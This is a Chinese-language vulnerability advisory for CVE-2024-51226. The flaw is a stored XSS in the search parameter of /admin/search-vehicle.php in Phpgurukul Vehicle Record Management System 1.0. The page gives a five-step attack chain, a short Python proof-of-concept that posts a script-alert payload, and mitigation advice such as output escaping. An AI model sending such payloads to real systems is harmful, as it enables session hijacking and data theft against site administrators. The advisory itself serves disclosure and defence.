CVE-2024-51226 CVSS 6.1 中危

CVE-2024-51226 Phpgurukul车辆管理系统存储型XSS漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2024-51226

漏洞类型

存储型跨站脚本 (Stored XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Phpgurukul Vehicle Record Management System

漏洞概述

Phpgurukul车辆管理系统v1.0版本中的/admin/search-vehicle.php组件存在存储型跨站脚本（XSS）漏洞。由于系统未对用户提交的Search参数进行充分的过滤和转义，攻击者可以注入恶意的Web脚本或HTML代码。当管理员或其他用户访问包含该恶意内容的搜索结果页面时，注入的脚本将在其浏览器上下文中执行，可能导致会话劫持、敏感信息窃取或恶意重定向等安全风险。

技术细节

该漏洞源于Phpgurukul车辆管理系统在处理搜索功能时存在输入验证缺失。具体而言，在/admin/search-vehicle.php接口中，程序直接将用户传入的“Search”参数存储到数据库中，而在后续页面渲染时未进行HTML实体编码。攻击者无需认证即可向系统发送包含JavaScript代码的特制HTTP请求（如POST或GET）。一旦载荷被服务器接收并持久化，任何拥有权限查看搜索记录的用户（特别是管理员）在访问该页面时，浏览器都会解析并执行该恶意脚本。根据CVSS 3.1向量，该漏洞利用复杂度低，需要用户交互，且可能导致机密性和完整性受损。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标使用的是Phpgurukul车辆管理系统v1.0，并定位到/admin/search-vehicle.php接口。

STEP 2

2. 载荷构造与注入

攻击者构造包含JavaScript代码的恶意载荷，并通过Search参数将其发送至服务器。

STEP 3

3. 恶意数据存储

服务器接收到请求后，未对Search参数进行有效过滤，直接将恶意载荷存储在数据库中。

STEP 4

4. 诱导访问

攻击者等待或诱导管理员（或其他拥有权限的用户）访问系统中的车辆搜索页面。

STEP 5

5. 代码执行

当管理员加载页面时，服务器读取并输出未经过滤的恶意数据，浏览器解析并执行其中的脚本，攻击生效。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_stored_xss(target_url):
    # Target endpoint for the search functionality
    endpoint = f"{target_url}/admin/search-vehicle.php"
    
    # Malicious payload to demonstrate XSS execution
    # Payload: Simple script to show an alert box
    xss_payload = '<script>alert("CVE-2024-51226_POC");</script>'
    
    # Data payload to be sent in the request
    # Assuming the parameter name is 'search' based on the description
    data = {
        "search": xss_payload
    }
    
    try:
        # Sending the POST request to inject the payload
        response = requests.post(endpoint, data=data)
        
        if response.status_code == 200:
            print("[+] Payload sent successfully.")
            print("[+] Check the admin search page to verify if the alert triggers.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost"
    exploit_stored_xss(target)

影响范围

Phpgurukul Vehicle Record Management System 1.0

防御指南

临时缓解措施

建议立即检查系统日志以确认是否已被攻击。开发人员应修改/admin/search-vehicle.php文件，在接收Search参数时使用正则表达式进行白名单验证，或者在输出数据时使用PHP内置函数（如htmlspecialchars）进行转义，防止浏览器将其解释为脚本代码。在官方修复前，可考虑限制外部对该接口的访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表